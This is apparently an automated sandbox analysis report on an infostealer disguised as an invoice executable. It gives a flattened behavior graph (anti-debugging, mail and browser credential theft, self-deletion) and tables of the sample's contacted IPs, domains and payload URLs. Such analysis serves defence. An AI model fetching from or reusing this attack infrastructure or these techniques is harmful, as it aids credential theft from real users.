behaviorgraph top1 signatures2 2 Behavior Graph ID: 482656 Sample: usd15.030 payment copy & si... Startdate: 14/09/2021 Architecture: WINDOWS Score: 100 36 Potential malicious icon found 2->36 38 Found malware configuration 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 9 other signatures 2->42 8 usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 2->8         started        process3 signatures4 44 Tries to detect Any.run 8->44 46 Hides threads from debuggers 8->46 11 usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 82 8->11         started        process5 dnsIp6 30 94.158.245.117, 49791, 80 MIVOCLOUDMD Moldova Republic of 11->30 32 telete.in 195.201.225.248, 443, 49790 HETZNER-ASDE Germany 11->32 34 3 other IPs or domains 11->34 22 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 11->22 dropped 24 C:\Users\user\AppData\...\vcruntime140.dll, PE32 11->24 dropped 26 C:\Users\user\AppData\...\ucrtbase.dll, PE32 11->26 dropped 28 56 other files (none is malicious) 11->28 dropped 48 Tries to steal Mail credentials (via file access) 11->48 50 Self deletion via cmd delete 11->50 52 Tries to harvest and steal browser information (history, passwords, etc) 11->52 54 2 other signatures 11->54 16 cmd.exe 1 11->16         started        file7 signatures8 process9 process10 18 conhost.exe 16->18         started        20 timeout.exe 1 16->20         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.201.225.248
 telete.in Germany
24940 HETZNER-ASDE false
94.158.245.117
 unknown Moldova Republic of
39798 MIVOCLOUDMD false
142.250.102.132
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
142.250.102.101
 drive.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.102.101 true
telete.in 195.201.225.248 true
googlehosted.l.googleusercontent.com 142.250.102.132 true
doc-04-1s-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://94.158.245.117//l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 false
  • Avira URL Cloud: safe
 unknown
http://94.158.245.117//l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 false
  • Avira URL Cloud: safe
 unknown
https://doc-04-1s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download false
    		high
    http://94.158.245.117/ false
    • Avira URL Cloud: safe
    		 unknown
    https://telete.in/marinolumuop false
    • Avira URL Cloud: safe
    		 unknown